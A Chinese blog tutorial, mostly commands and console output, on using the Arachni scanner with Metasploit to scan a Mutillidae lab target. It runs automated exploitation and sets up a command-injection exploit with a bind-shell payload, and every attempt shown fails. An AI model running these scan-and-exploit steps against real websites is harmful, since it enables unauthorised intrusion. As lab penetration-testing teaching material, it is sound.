欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

WebApp exploitation with Arachni and Metasploit

程序员文章站 2022-04-22 11:02:51
arachni作为一款开源的扫描软件,在判断web脚本漏洞上的效率和精确度还是让人称赞的,arachni作为一款主流的开源扫描软件,当然要跟随趋势,可以很好的和metasploit...

arachni作为一款开源的扫描软件,在判断web脚本漏洞上的效率和精确度还是让人称赞的,arachni作为一款主流的开源扫描软件,当然要跟随趋势,可以很好的和metasploit配合使用,通过msf plugin,与metasploit达到无缝对接。
今天我们演示arachni与metasploit配合对网站进行扫描检测和入侵。我的测试环境为

metasploitable+backbox+arachni+metasploit

首先我们通过arachni来对目标机进行扫描,看图说话,不多累赘:
WebApp exploitation with Arachni and Metasploit


 

root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
Author: Tasos "Zapotek" Laskos 

(With the support of the community and the Arachni Team.)

Website: http://arachni-scanner.com
Documentation: http://arachni-scanner.com/wiki

[~] No modules were specified.
[~] -> Will run all mods. [~] No audit options were specified.
[~] -> Will audit links, forms and cookies.


通过扫描,保存扫描日志为msf格式,以便于metasploit调用。

为了引入arachni的plugin到metasploit,我们需找到arachni的目录,复制external/metasploit到metasploit的根目录下面
cp -R arachni/external/metasploit/* /opt/backbox/msf/
然后运行metasploit,加载arachni插件,运行如下图
WebApp exploitation with Arachni and Metasploit

root@metasploit:~# msfconsole

[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID Exploit Description
-- ------- -----------
1 auxiliary/arachni_sqlmap



我们看下arachni的自动攻击参数
 

msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
-h Display this help text
-x [regexp] Only run modules whose name matches the regex
-a Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-m Use a meterpreter shell (if possible)
-q Disable exploit module output

我们选择加载所有的溢出来进行匹配

WebApp exploitation with Arachni and Metasploit


 

msf > arachni_autopwn -a
[*] Running pwn-jobs...

[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...

[*] Started bind handler
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

[*] The autopwn command has completed with 0 sessions


很不幸,木有一个成功的…………

接下来我们要看下arachni到底扫描出来了哪些漏洞,执行如下命令:

WebApp exploitation with Arachni and Metasploit



 

msf > arachni_list_vulns

Vulnerabilities
===============

ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap
4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap
12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap
13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap
15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal


让俺这个土鳖手工溢出一下第17个漏洞
WebApp exploitation with Arachni and Metasploit

msf> arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST => 127.0.0.1
SRVPORT => 10401
RHOST => 192.168.1.35
RPORT => 80
LHOST => 127.0.0.1
LPORT => 5376
SSL => false
POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS
METHOD => POST
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH => /mutillidae/index.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) >


看下配置有没有问题,木有问题就开始执行,

WebApp exploitation with Arachni and Metasploit


 

msf exploit(arachni_exec) > show options

Module options (exploit/unix/webapp/arachni_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH /mutillidae/index.php yes The path to the vulnerable script.
POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies no Use a proxy chain
RHOST 192.168.1.35 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5376 yes The listen port
RHOST 192.168.1.35 no The target address

Exploit target:

Id Name
-- ----
0 Automatic


看来是应该没问题了,手动执行一下,看看最近攒的人品攒够了没

-_-!!!人品不好,两次都没成功

 

msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) >



今天的这个测试环境很不给面子啊,一个都没成功,不过这里只是给大家展示,如何利用arachni和metasploit对一个web进行检测和入侵的过程,简单的吹水,高手请自动忽略,有问题请留言!!